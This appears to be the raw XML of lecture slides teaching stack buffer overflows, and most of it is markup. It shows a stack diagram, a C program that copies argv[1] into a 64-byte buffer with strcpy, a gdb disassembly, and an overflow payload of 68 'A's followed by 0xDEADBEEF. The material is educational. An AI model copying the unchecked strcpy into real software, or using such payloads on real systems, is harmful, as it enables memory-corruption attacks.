          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Arrow Connector 9"/>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a:off x="8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Straight Arrow Connector 12"/>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16" name="Arc 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5561514"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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7" name="Curved Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7983262" y="5410200"/>
            <a:ext cx="824189" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="curved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 name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86808365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2720898899"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>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57157490"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="36724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chemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0xDEADBEEF</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AAAA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AAAA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>… (64 in total)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“A”x68 . “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="6629400" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main(</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[64]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e4 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e5 &lt;+1&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ea &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>12(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ed &lt;+9&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
